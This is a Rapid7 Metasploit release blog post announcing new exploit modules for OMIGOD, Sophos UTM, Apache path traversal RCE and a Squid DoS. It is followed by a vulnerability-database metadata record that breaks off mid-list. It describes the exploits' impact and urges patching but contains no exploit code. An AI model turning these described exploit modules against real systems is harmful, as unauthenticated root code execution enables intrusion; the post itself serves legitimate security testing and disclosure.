Description
## OMIGOD It's RCE

We are excited to announce that we now have a module for the OMIGOD vulnerability that exploits [CVE-2021-38647](<https://attackerkb.com/topics/08O94gYdF1/cve-2021-38647?referrer=blog>) courtesy of our very own Spencer McIntyre! Successful exploitation will allow an unauthenticated attacker to gain `root` level code execution against affected servers. Given that this has seen exploitation in the wild by the Mirai botnet, we hope you're patched, lest your servers decide to join the zombie horde this Halloween!
## Sophos Contributes to the RCE Pile
Continuing the trend of unauthenticated RCE exploits that grant `root` level code execution, this week we also have an exploit for [CVE-2020-25223](<https://attackerkb.com/topics/rOhVHstwNO/cve-2020-25223?referrer=blog>), an unauthenticated RCE within the Sophos UTM WebAdmin service. Whilst we haven't yet seen exploitation in the wild of this bug, this is definitely one to patch given its severity. Stay frosty folks!
## Guess Who’s Back, Back Again, Apache's Back, Tell a Friend
Whilst not a marshalling bug (I'm sorry, it's Halloween some puns are needed), community contributors Ash Daulton, Dhiraj Mishra, and mekhalleh (RAMELLA Sébastien), have added a scanner and exploit for [CVE-2021-41773](<https://attackerkb.com/topics/1RltOPCYqE/cve-2021-41773?referrer=blog>) and [CVE-2021-42013](<https://attackerkb.com/topics/CVE-2021-42013?referrer=blog>), which was based off of work from [RootUp](<https://github.com/RootUp/PersonalStuff/blob/master/http-vuln-cve-2021-41773.nse>), [ProjectDiscovery](<https://github.com/projectdiscovery/nuclei-templates/blob/master/vulnerabilities/apache/apache-httpd-rce.yaml>), and [HackerFantastic](<https://twitter.com/hackerfantastic/status/1445531829985968137>). Path traversal vulnerabilities are relatively easy to exploit, and this got a lot of attention in the news since it's been a long time since Apache has seen a reliable RCE exploit against it. This is definitely one to patch if you're running any Apache servers. Successful exploitation will result in remote code execution as the user running the Apache server.
## New module content (6)
* [Squid Proxy Range Header DoS](<https://github.com/rapid7/metasploit-framework/pull/15756>) by Joshua Rogers, which exploits [CVE-2021-31806](<https://attackerkb.com/topics/2k0UqRcdTC/cve-2021-31806?referrer=search>) and [CVE-2021-31807](<https://attackerkb.com/topics/xIwbe92O2s/cve-2021-31807?referrer=blog>) \- This adds a module that leverages CVE-2021-31806 and CVE-2021-31807 to trigger a denial of service condition in vulnerable Squid proxy servers.
* [Apache 2.4.49/2.4.50 Traversal RCE scanner](<https://github.com/rapid7/metasploit-framework/pull/15754>) by Ash Daulton, Dhiraj Mishra, and mekhalleh (RAMELLA Sébastien), which exploits [CVE-2021-41773](<https://attackerkb.com/topics/1RltOPCYqE/cve-2021-41773?referrer=search>) and [CVE-2021-42013](<https://attackerkb.com/topics/CVE-2021-42013?referrer=blog>) \- This adds both a scanner and exploit module for the two recent path traversal vulnerabilities in the apache2 HTTP server. The RCE module requires `mod_cgi` to be enabled but can be exploited remotely without any authentication. These vulnerabilities are identified as CVE-2021-41773 and CVE-2021-42013.
* [Sophos UTM WebAdmin SID Command Injection](<https://github.com/rapid7/metasploit-framework/pull/15783>) by wvu and Justin Kennedy, which exploits [CVE-2020-25223](<https://attackerkb.com/topics/rOhVHstwNO/cve-2020-25223?referrer=blog>) \- This adds an exploit for CVE-2020-25223 which is an unauthenticated RCE within the Sophos UTM WebAdmin service. Exploitation results in OS command execution as the `root` user.
* [Microsoft OMI Management Interface Authentication Bypass](<https://github.com/rapid7/metasploit-framework/pull/15800>) by wvu, Nir Ohfeld, Shir Tamari, and Spencer McIntyre, which exploits [CVE-2021-38647](<https://attackerkb.com/topics/08O94gYdF1/cve-2021-38647?referrer=blog>) \- We added an unauthenticated RCE exploit for Microsoft OMI "OMIGOD" CVE-2021-38647. Successful exploitation grants code execution as the `root` user.
* [Apache 2.4.49/2.4.50 Traversal RCE](<https://github.com/rapid7/metasploit-framework/pull/15754>) by Ash Daulton, Dhiraj Mishra, and mekhalleh (RAMELLA Sébastien), which exploits [CVE-2021-41773](<https://attackerkb.com/topics/1RltOPCYqE/cve-2021-41773?referrer=search>) and [CVE-2021-42013](<https://attackerkb.com/topics/CVE-2021-42013?referrer=blog>) \- This adds both a scanner and exploit module for the two recent path traversal vulnerabilities in the apache2 HTTP server. The RCE module requires `mod_cgi` to be enabled but can be exploited remotely without any authentication. These vulnerabilities are identified as CVE-2021-41773 and CVE-2021-42013.
* [Browse the session filesystem in a Web Browser](<https://github.com/rapid7/metasploit-framework/pull/15558>) by timwr - This adds a post module that allows the user to view the Meterpreter sessions filesystem via a locally hosted web page.
## Enhancements and features
* [#15681](<https://github.com/rapid7/metasploit-framework/pull/15681>) from [smashery](<https://github.com/smashery>) \- This adds support for reverse port forwarding via established SSH sessions.
* [#15778](<https://github.com/rapid7/metasploit-framework/pull/15778>) from [k0pak4](<https://github.com/k0pak4>) \- This PR adds documentation for the http trace scanner.
* [#15788](<https://github.com/rapid7/metasploit-framework/pull/15788>) from [zeroSteiner](<https://github.com/zeroSteiner>) \- When generating a Powershell command payload would exceed the maximum length allowed to successfully execute, gracefully fall back to omitting an ASMI bypass.
* [#15803](<https://github.com/rapid7/metasploit-framework/pull/15803>) from [k0pak4](<https://github.com/k0pak4>) \- This adds f5_bigip_virtual_server scanner documentation.
## Bugs fixed
* [#15799](<https://github.com/rapid7/metasploit-framework/pull/15799>) from [adfoster-r7](<https://github.com/adfoster-r7>) \- This fixes a crash in the `iis_internal_ip` module.
## Get it
As always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog post from GitHub:
* [Pull Requests 6.1.11...6.1.12](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-10-21T11%3A22%3A54-04%3A00..2021-10-28T08%3A17%3A18-05%3A00%22>)
* [Full diff 6.1.11...6.1.12](<https://github.com/rapid7/metasploit-framework/compare/6.1.11...6.1.12>)
If you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest version of Metasploit Framework. To install fresh without using `git`, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the [binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).
Related
{"id": "RAPID7BLOG:8C1A6CAF7B07CD1A38A8D65351756A2F", "type": "rapid7blog", "bulletinFamily": "info", "title": "Metasploit Wrap-Up", "description": "## OMIGOD It's RCE\n\n\n\nWe are excited to announce that we now have a module for the OMIGOD vulnerability that exploits [CVE-2021-38647](<https://attackerkb.com/topics/08O94gYdF1/cve-2021-38647?referrer=blog>) courtesy of our very own Spencer McIntyre! Successful exploitation will allow an unauthenticated attacker to gain `root` level code execution against affected servers. Given that this has seen exploitation in the wild by the Mirai botnet, we hope you're patched, lest your servers decide to join the zombie horde this Halloween!\n\n## Sophos Contributes to the RCE Pile\n\nContinuing the trend of unauthenticated RCE exploits that grant `root` level code execution, this week we also have an exploit for [CVE-2020-25223](<https://attackerkb.com/topics/rOhVHstwNO/cve-2020-25223?referrer=blog>), an unauthenticated RCE within the Sophos UTM WebAdmin service. Whilst we haven't yet seen exploitation in the wild of this bug, this is definitely one to patch given its severity. Stay frosty folks!\n\n## Guess Who\u2019s Back, Back Again, Apache's Back, Tell a Friend\n\nWhilst not a marshalling bug (I'm sorry, it's Halloween some puns are needed), community contributors Ash Daulton, Dhiraj Mishra, and mekhalleh (RAMELLA S\u00e9bastien), have added a scanner and exploit for [CVE-2021-41773](<https://attackerkb.com/topics/1RltOPCYqE/cve-2021-41773?referrer=blog>) and [CVE-2021-42013](<https://attackerkb.com/topics/CVE-2021-42013?referrer=blog>), which was based off of work from [RootUp](<https://github.com/RootUp/PersonalStuff/blob/master/http-vuln-cve-2021-41773.nse>), [ProjectDiscovery](<https://github.com/projectdiscovery/nuclei-templates/blob/master/vulnerabilities/apache/apache-httpd-rce.yaml>), and [HackerFantastic](<https://twitter.com/hackerfantastic/status/1445531829985968137>). Path traversal vulnerabilities are relatively easy to exploit, and this got a lot of attention in the news since it's been a long time since Apache has seen a reliable RCE exploit against it. This is definitely one to patch if you're running any Apache servers. Successful exploitation will result in remote code execution as the user running the Apache server.\n\n## New module content (6)\n\n * [Squid Proxy Range Header DoS](<https://github.com/rapid7/metasploit-framework/pull/15756>) by Joshua Rogers, which exploits [CVE-2021-31806](<https://attackerkb.com/topics/2k0UqRcdTC/cve-2021-31806?referrer=search>) and [CVE-2021-31807](<https://attackerkb.com/topics/xIwbe92O2s/cve-2021-31807?referrer=blog>) \\- This adds a module that leverages CVE-2021-31806 and CVE-2021-31807 to trigger a denial of service condition in vulnerable Squid proxy servers.\n * [Apache 2.4.49/2.4.50 Traversal RCE scanner](<https://github.com/rapid7/metasploit-framework/pull/15754>) by Ash Daulton, Dhiraj Mishra, and mekhalleh (RAMELLA S\u00e9bastien), which exploits [CVE-2021-41773](<https://attackerkb.com/topics/1RltOPCYqE/cve-2021-41773?referrer=search>) and [CVE-2021-42013](<https://attackerkb.com/topics/CVE-2021-42013?referrer=blog>) \\- This adds both a scanner and exploit module for the two recent path traversal vulnerabilities in the apache2 HTTP server. The RCE module requires `mod_cgi` to be enabled but can be exploited remotely without any authentication. These vulnerabilities are identified as CVE-2021-41773 and CVE-2021-42013.\n * [Sophos UTM WebAdmin SID Command Injection](<https://github.com/rapid7/metasploit-framework/pull/15783>) by wvu and Justin Kennedy, which exploits [CVE-2020-25223](<https://attackerkb.com/topics/rOhVHstwNO/cve-2020-25223?referrer=blog>) \\- This adds an exploit for CVE-2020-25223 which is an unauthenticated RCE within the Sophos UTM WebAdmin service. Exploitation results in OS command execution as the `root` user.\n * [Microsoft OMI Management Interface Authentication Bypass](<https://github.com/rapid7/metasploit-framework/pull/15800>) by wvu, Nir Ohfeld, Shir Tamari, and Spencer McIntyre, which exploits [CVE-2021-38647](<https://attackerkb.com/topics/08O94gYdF1/cve-2021-38647?referrer=blog>) \\- We added an unauthenticated RCE exploit for Microsoft OMI "OMIGOD" CVE-2021-38647. Successful exploitation grants code execution as the `root` user.\n * [Apache 2.4.49/2.4.50 Traversal RCE](<https://github.com/rapid7/metasploit-framework/pull/15754>) by Ash Daulton, Dhiraj Mishra, and mekhalleh (RAMELLA S\u00e9bastien), which exploits [CVE-2021-41773](<https://attackerkb.com/topics/1RltOPCYqE/cve-2021-41773?referrer=search>) and [CVE-2021-42013](<https://attackerkb.com/topics/CVE-2021-42013?referrer=blog>) \\- This adds both a scanner and exploit module for the two recent path traversal vulnerabilities in the apache2 HTTP server. The RCE module requires `mod_cgi` to be enabled but can be exploited remotely without any authentication. These vulnerabilities are identified as CVE-2021-41773 and CVE-2021-42013.\n * [Browse the session filesystem in a Web Browser](<https://github.com/rapid7/metasploit-framework/pull/15558>) by timwr - This adds a post module that allows the user to view the Meterpreter sessions filesystem via a locally hosted web page.\n\n## Enhancements and features\n\n * [#15681](<https://github.com/rapid7/metasploit-framework/pull/15681>) from [smashery](<https://github.com/smashery>) \\- This adds support for reverse port forwarding via established SSH sessions.\n * [#15778](<https://github.com/rapid7/metasploit-framework/pull/15778>) from [k0pak4](<https://github.com/k0pak4>) \\- This PR adds documentation for the http trace scanner.\n * [#15788](<https://github.com/rapid7/metasploit-framework/pull/15788>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- When generating a Powershell command payload would exceed the maximum length allowed to successfully execute, gracefully fall back to omitting an ASMI bypass.\n * [#15803](<https://github.com/rapid7/metasploit-framework/pull/15803>) from [k0pak4](<https://github.com/k0pak4>) \\- This adds f5_bigip_virtual_server scanner documentation.\n\n## Bugs fixed\n\n * [#15799](<https://github.com/rapid7/metasploit-framework/pull/15799>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This fixes a crash in the `iis_internal_ip` module.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog post from GitHub:\n\n * [Pull Requests 6.1.11...6.1.12](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-10-21T11%3A22%3A54-04%3A00..2021-10-28T08%3A17%3A18-05%3A00%22>)\n * [Full diff 6.1.11...6.1.12](<https://github.com/rapid7/metasploit-framework/compare/6.1.11...6.1.12>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest version of Metasploit Framework. To install fresh without using `git`, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the [binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "published": "2021-10-29T17:59:46", "modified": "2021-10-29T17:59:46", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://blog.rapid7.com/2021/10/29/metasploit-wrap-up-136/", "reporter": "Grant Willcox", "references": [], "cvelist": ["CVE-2020-25223", "CVE-2021-31806", "CVE-2021-31807", "CVE-2021-38647", "CVE-2021-41773", "CVE-2021-42013"], "immutableFields": [], "lastseen": "2021-10-29T19:03:07", "viewCount": 94, "enchantments": {"dependencies": {"references": [{"type": "akamaiblog", "idList": ["AKAMAIBLOG:72129348AFF386C88DD2D4145C64F678"]}, {"type": "almalinux", "idList": ["ALSA-2021:4292"]}, {"type": "amazon", "idList": ["ALAS-2021-1543", "ALAS2-2021-1716"]}, {"type": "archlinux", "idList": ["ASA-202110-1"]}, {"type": "attackerkb", "idList": ["AKB:0802ECEE-BB4C-4C5B-969C-32CB9808C281", "AKB:0B46025D-A4C7-4FB0-ADA5-7244A30E7D6E", "AKB:4BB9D3C7-37EF-4B65-B2A8-550AFC30664C", "AKB:61971866-F0B5-4317-8AF4-C4E4C23279F1", "AKB:BD8195D2-FB3B-4F9B-82C5-32F5CBDEFF70", "AKB:FE7E2037-F0E0-48D7-8F74-C9682BC04A73"]}, {"type": "avleonov", "idList": ["AVLEONOV:5945665DFA613F7707360C10CED8C916", "AVLEONOV:99215B2D7808C46D8762AD712CD3D267"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0684", "CPAI-2021-0749"]}, {"type": "cisa", "idList": ["CISA:76FE595B1B89D06301E16CB8087D39BD", "CISA:78B08801DAA7C3B8A2D34A5790730C76", "CISA:82FAB13698D3611E1292062AD6C8B405"]}, {"type": "cisco", "idList": ["CISCO-SA-APACHE-HTTPD-PATHTRV-LAZG68CZ"]}, {"type": "cve", "idList": ["CVE-2020-25223", "CVE-2021-31806", "CVE-2021-31807", "CVE-2021-38647", "CVE-2021-41773", "CVE-2021-42013"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2685-1:9A36F", "DEBIAN:DSA-4924-1:931B6"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2021-31806", "DEBIANCVE:CVE-2021-31807", "DEBIANCVE:CVE-2021-41773", "DEBIANCVE:CVE-2021-42013"]}, {"type": "dsquare", "idList": ["E-738", "E-739"]}, {"type": "exploitdb", "idList": ["EDB-ID:50383", "EDB-ID:50406", "EDB-ID:50446", "EDB-ID:50512"]}, {"type": "f5", "idList": ["F5:K04082144"]}, {"type": "fedora", "idList": ["FEDORA:00C4C3098596", "FEDORA:BDD0730B86DF", "FEDORA:C4C0D3091C28", "FEDORA:CC54030AE7DD"]}, {"type": "freebsd", "idList": ["25B78BDD-25B8-11EC-A341-D4C9EF517024", "D001C189-2793-11EC-8FB1-206A8A720317"]}, {"type": "gentoo", "idList": ["GLSA-202105-14"]}, {"type": "githubexploit", "idList": ["00EC8F03-D8A3-56D4-9F8C-8DD1F5ACCA08", "04E3583E-DFED-5D0D-BCF2-1C1230EB666D", "05403438-4985-5E78-A702-784E03F724D4", "06076ECD-3FB7-53EC-8572-ABBB20029812", "09412330-832C-538A-A226-61474048E41B", "0AA6A425-25B1-5D2A-ABA1-2933D3E1DC56", "0BC014D0-F944-5E78-B5FA-146A8E5D0F8A", "0C28A0EC-7162-5D73-BEC9-B034F5392847", "0C47BCF2-EA6F-5613-A6E8-B707D64155DE", "108A0713-4AB8-5A1F-A16B-4BB13ECEC9B2", "11813536-2AFF-5EA4-B09F-E9EB340DDD26", "1B75F2E2-5B30-58FA-98A4-501B91327D7F", "1C39E10A-4A38-5228-8334-2A5F8AAB7FC3", "1E6E9010-4BDF-5C30-951C-79C280B90883", "1EC6324C-A18E-517A-9A55-F1C2D1BCA358", "22DCCD26-B68C-5905-BAC2-71D10DE3F123", "24ADD37D-C8A1-5671-A0F4-378760FC69AC", "27108E72-8DC1-53B5-97D9-E869CA13EFF7", "2A177215-CE4A-5FA7-B016-EEAF332D165C", "2B4FEB27-377B-557B-AE46-66D677D5DA1C", "365CD0B0-D956-59D6-9500-965BF4017E2D", "37A9128D-17C4-50FF-B025-5FC3E0F3F338", "3AE03E90-26EC-5F91-B84E-F04AF6239A9F", "3B159471-590A-5941-ADED-20F4187E8C63", "3C5B500C-1858-5834-9D23-38DBE44AE969", "3CF66144-235E-5F7A-B889-113C11ABF150", "4051D2EF-1C43-576D-ADB2-B519B31F93A0", "4427DEE4-E1E2-5A16-8683-D74750941604", "44E43BB7-6255-58E7-99C7-C3B84645D497", "45F0EB7B-CE04-5103-9D40-7379AE4B6CDD", "495E99E5-C1B0-52C1-9218-384D04161BE4", "4B44115D-85A3-5E62-B9A8-5F336C24673F", "4B46EB21-DF1F-5D84-AE44-9BCFE311DFB9", "4C79D8E5-D595-5460-AA84-18D4CB93E8FC", "4E4BAF15-6430-514A-8679-5B9F03584B71", "4E5A5BA8-3BAF-57F0-B71A-F04B4D066E4F", "500CE683-17EB-5776-8EF6-85122451B145", "52E13088-9643-5E81-B0A0-B7478BCF1F2C", "5312D04F-9490-5472-84FA-86B3BBDC8928", "54D698B4-9CF0-5D7F-88D2-1053A11EA7C3", "5A54F5DA-F9C1-508B-AD2D-3E45CD647D31", "5D88E443-7AB2-5034-910D-D52A5EFFF5FC", "61075B23-F713-537A-9B84-7EB9B96CF228", "610ADCD3-C281-52D4-A546-467569FE3AC1", "628A345B-5FD8-5A2F-8782-9125584E4C89", "64DFB465-6754-5E4B-B311-7668EDD4D962", "68A13FF0-60E5-5A29-9248-83A940B0FB02", "68E78C64-D93A-5E8B-9DEA-4A8D826B474E", "6A0A657E-8300-5312-99CE-E11F460B1DBF", "6BCBA83C-4A4C-58D7-92E4-DF092DFEF267", "6C0C909F-3307-5755-97D2-0EBD17367154", "6CAA7558-723B-5286-9840-4DF4EB48E0AF", "6E104766-2F7A-5A0A-A24B-61D9B52AD4EE", "7248BA4C-3FE5-5529-9E4C-C91E241E8AA0", "749F952B-3ACF-56B2-809D-D66E756BE839", "78787F63-0356-51EC-B32A-B9BD114431C3", "788F7DF8-01F3-5D13-9B3E-E4AA692153E6", "789B6112-E84C-566E-89A7-82CC108EFCD9", "805E6B24-8DF9-51D8-8DF6-6658161F96EA", "8217668C-9748-5511-8C01-7E933D69F872", "86360765-0B1A-5D73-A805-BAE8F1B5D16D", "8713FD59-264B-5FD7-8429-3251AB5AB3B8", "88EB009A-EEFF-52B7-811D-A8A8C8DE8C81", "8A14FEAD-A401-5B54-84EB-2059841AD1DD", "8A57FAF6-FC91-52D1-84E0-4CBBAD3F9677", "8B4EDA16-9E27-500D-B648-9C3AD4295562", "8FB9E7A8-9A5B-5D87-9A44-AE4A1A92213D", "987C6FDB-3E70-5FF5-AB5B-D50065D27594", "9CEA663C-6236-5F45-B207-A873B971F988", "9D511461-7D24-5402-8E2A-58364D6E758F", "9EE3F7E3-70E6-503E-9929-67FE3F3735A2", "9F5B4253-EC2A-5A25-AB3C-CB76E45F7923", "A1FF76C0-CF98-5704-AEE4-DF6F1E434FA3", "A2D97DCC-04C2-5CB1-921F-709AA8D7FD9A", "A3F15BCE-08AD-509D-AE63-9D3D8E402E0B", "A6753173-D2DC-54CC-A5C4-0751E61F0343", "A6B7D4D8-4578-5AD8-961D-3BC35007FF29", "A8616E5E-04F8-56D8-ACB4-32FDF7F66EED", "A99AB73C-8E46-5B9C-A402-F78F96EE2327", "A9C7FB0F-65EC-5557-B6E8-6AFBBF8F140F", "AD440E9E-3A07-5AB3-99A0-11DD4C08AF47", "B4483895-BA86-5CFB-84F3-7C06411B5175", "B8198D62-F9C8-5E03-A301-9A3580070B4C", "B81BC21D-818E-5B33-96D7-062C14102874", "B946B2A1-2914-537A-BF26-94B48FC501B3", "BF40B403-9D06-5460-8B40-3FC2E56A4A07", "BF9B0898-784E-5B5E-9505-430B58C1E6B8", "C0380E16-C468-5540-A427-7FE34E7CF36B", "C068A003-5258-51DC-A3C0-786638A1B69C", "C26A395B-9695-59E4-908F-866A561936E9", "C8799CA3-C88C-5B39-B291-2895BE0D9133", "C879EE66-6B75-5EC8-AA68-08693C6CCAD1", "C8C7BBD4-C089-5DA7-8474-A5B2B7DC5E79", "CD48BD40-E52A-5A8B-AE27-B57C358BB0EE", "CE2FB7D7-ABCF-58F8-AACC-D0E6FEE8865A", "D0368327-F989-5557-A5C6-0D9ACDB4E72F", "DBF996C3-DC2A-5859-B767-6B2FC38F2185", "DF57E8F1-FE21-5EB9-8FC7-5F2EA267B09D", "E59A01BE-8176-5F5E-BD32-D30B009CDBDA", "E6B39247-8016-5007-B505-699F05FCA1B5", "E7B177F6-FA62-52FE-A108-4B8FC8112B7F", "E81474F6-6DDC-5FC2-828A-812A8815E3B4", "E9FE319B-26BF-5A75-8C6A-8AE55D7E7615", "ECD5D758-774C-5488-B782-C8996208B401", "F41EE867-4E63-5259-9DF0-745881884D04", "F893E602-F8EB-5D23-8ABF-920890DB23A3", "F8A7DE57-8F14-5B3C-A102-D546BDD8D2B8", "FA1DEEA0-A8AF-5C21-98E6-9D3379266529", "FCAF01A0-F921-5DB1-BBC5-850EC2DC5C46", "FDF4BBB1-979C-5320-95EA-9EC7EB064D72", "FF2EF58E-53AA-5B60-9EA1-4B5C29647395", "FF610CB4-801A-5D1D-9AC9-ADFC287C8482", "FFE89CAE-FAA6-5E93-9994-B5F4D0EC2197"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:CA925EE6A931620550EF819815B14156"]}, {"type": "hackerone", "idList": ["H1:1394916", "H1:1400238", "H1:1404731"]}, {"type": "hivepro", "idList": ["HIVEPRO:7FC9DCD27C78F4BFA53C84B6CB04EC19"]}, {"type": "httpd", "idList": ["HTTPD:2C849FE5B165E832EE21ADAECFA9521C", "HTTPD:E1C40920F9DFC60284EEE7539DA30483"]}, {"type": "ibm", "idList": ["1E405D4974F6EA8AB73C7DDA9E9B3B2FCA2359AF05B6CF7C124046402F2BC520", "B0C070EA4747AEFBB7DD852AD2FEB1C85461D6FC3CC95192FD2B7703C8D3DCB2"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:FEBE35B3CF79AFD5E057AF4D43E9C08F"]}, {"type": "jvn", "idList": ["JVN:51106450"]}, {"type": "kaspersky", "idList": ["KLA12286", "KLA12297", "KLA12371"]}, {"type": "kitploit", "idList": ["KITPLOIT:1567876964965286721", "KITPLOIT:3027120689321178260", "KITPLOIT:4143386305519508041", "KITPLOIT:4700475362409254459", "KITPLOIT:9205213728263868656"]}, {"type": "krebs", "idList": ["KREBS:2EC42B845847A6DCFE50ECEB9FF61C29"]}, {"type": "mageia", "idList": ["MGASA-2021-0237", "MGASA-2021-0461", "MGASA-2021-0470"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:76333D1F0FCAFD79FA2EDD4A4CAFBB38", "MALWAREBYTES:916ADA06F0F0B2E4CCBAE56C7FEA87D1"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY-DOS-HTTP-SQUID_RANGE_DOS-", "MSF:AUXILIARY-SCANNER-HTTP-APACHE_NORMALIZE_PATH-", "MSF:EXPLOIT-LINUX-HTTP-SOPHOS_UTM_WEBADMIN_SID_CMD_INJECTION-", "MSF:EXPLOIT-LINUX-LOCAL-CVE_2021_38648_OMIGOD-", "MSF:EXPLOIT-LINUX-MISC-CVE_2021_38647_OMIGOD-", "MSF:EXPLOIT-MULTI-HTTP-APACHE_NORMALIZE_PATH_RCE-"]}, {"type": "mscve", "idList": ["MS:CVE-2021-38647"]}, {"type": "msrc", "idList": ["MSRC:69CC27233CB7711437A7019644E4AE73"]}, {"type": "nessus", "idList": ["AL2_ALAS-2021-1716.NASL", "ALA_ALAS-2021-1543.NASL", "APACHE_2_4_49_PATH_TRAVERSAL.NBIN", "APACHE_2_4_50.NASL", "APACHE_2_4_50_PATH_TRAVERSAL.NBIN", "APACHE_2_4_51.NASL", "AZURE_OPEN_MGMT_INFRA_1_6_8_1.NASL", "CENTOS8_RHSA-2021-4292.NASL", "DEBIAN_DLA-2685.NASL", "DEBIAN_DSA-4924.NASL", "EULEROS_SA-2021-2317.NASL", "EULEROS_SA-2021-2433.NASL", "EULEROS_SA-2021-2519.NASL", "EULEROS_SA-2021-2618.NASL", "FREEBSD_PKG_25B78BDD25B811ECA341D4C9EF517024.NASL", "FREEBSD_PKG_D001C189279311EC8FB1206A8A720317.NASL", "GENTOO_GLSA-202105-14.NASL", "OMI_1_6_8_1.NASL", "OMI_CVE-2021-38647.NBIN", "OPENSUSE-2021-1961.NASL", "OPENSUSE-2021-879.NASL", "ORACLELINUX_ELSA-2021-4292.NASL", "ORACLELINUX_ELSA-2021-9465.NASL", "PHOTONOS_PHSA-2021-3_0-0269_SQUID.NASL", "PHOTONOS_PHSA-2021-4_0-0063_SQUID.NASL", "REDHAT-RHSA-2021-4292.NASL", "SUSE_SU-2021-1838-1.NASL", "SUSE_SU-2021-1961-1.NASL", "UBUNTU_USN-4981-1.NASL", "WEB_APPLICATION_SCANNING_113014", "WEB_APPLICATION_SCANNING_113015"]}, {"type": "oracle", "idList": ["ORACLE:CPUAPR2022", "ORACLE:CPUJAN2022"]}, {"type": "oraclelinux", "idList": ["ELSA-2021-4292", "ELSA-2021-9465"]}, {"type": "osv", "idList": ["OSV:DLA-2685-1", "OSV:DSA-4924-1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:164418", "PACKETSTORM:164501", "PACKETSTORM:164609", "PACKETSTORM:164629", "PACKETSTORM:164694", "PACKETSTORM:164697", "PACKETSTORM:164925", "PACKETSTORM:164941"]}, {"type": "photon", "idList": ["PHSA-2021-0063", "PHSA-2021-0118", "PHSA-2021-0269", "PHSA-2021-3.0-0269", "PHSA-2021-4.0-0063"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:5576D16DC39617927D8AEFF027CC0911", "QUALYSBLOG:78A056D339E07378EFC349E5ACA8EC30", "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:8D4E5743B0CE5246D493CE7356B4972D", "RAPID7BLOG:9C7E6BE350F06790928CFF68E04A6ECE", "RAPID7BLOG:CC071AA6971D64B0F7A596B2BBD5F046"]}, {"type": "redhat", "idList": ["RHSA-2021:4292"]}, {"type": "redhatcve", "idList": ["RH:CVE-2021-31806", "RH:CVE-2021-31807", "RH:CVE-2021-41773", "RH:CVE-2021-42013"]}, {"type": "saint", "idList": ["SAINT:3AB9E5583CEF507F3F7486F6FF1A59BA", "SAINT:4A73A5CD7FE341977E86117842CBB67D", "SAINT:A224EF4FDA8E067B5A4576A0BC6D6F10", "SAINT:B21EB0CE85BB4A8171AF59A4CF014F01", "SAINT:E5FBEA63E5EE8A91F5066541141037D1"]}, {"type": "slackware", "idList": ["SSA-2021-278-01", "SSA-2021-280-01"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2021:0879-1", "OPENSUSE-SU-2021:1961-1"]}, {"type": "thn", "idList": ["THN:67ECC712AB360F5A56F2434CDBF6B51F", "THN:69DC54E89A77C1E4E0DFE9C6EA3BAB48", "THN:A0816B13A402B9865C624E3CA1B06EA5", "THN:C6F6C1EB007027C65DE14DE5DA3E74BC"]}, {"type": "threatpost", "idList": ["THREATPOST:49DCD8325E10F7898739335BD99AE94B", "THREATPOST:5F0369916D5AFC90C3AF027AC4EC4A61", "THREATPOST:641CEDBD77D5E4711F6E56353D7B5E33", "THREATPOST:6D61C560E85ECD0A7A35C55E74849510", "THREATPOST:8325094507099F4F089C61EF2997445C", "THREATPOST:FD28EAD589B45A1A4A7412632B25CEAB"]}, {"type": "ubuntu", "idList": ["USN-4981-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2021-31806", "UB:CVE-2021-31807", "UB:CVE-2021-31808", "UB:CVE-2021-41773", "UB:CVE-2021-42013"]}, {"type": "veracode", "idList": ["VERACODE:30435", "VERACODE:30436", "VERACODE:32397", "VERACODE:32442"]}, {"type": "wallarmlab", "idList": ["WALLARMLAB:6D3FED0879553B4C47AD26ED1DEB5AEB"]}, {"type": "zdt", "idList": ["1337DAY-ID-36854", "1337DAY-ID-36897", "1337DAY-ID-36937", "1337DAY-ID-36952", "1337DAY-ID-36966", "1337DAY-ID-36967", 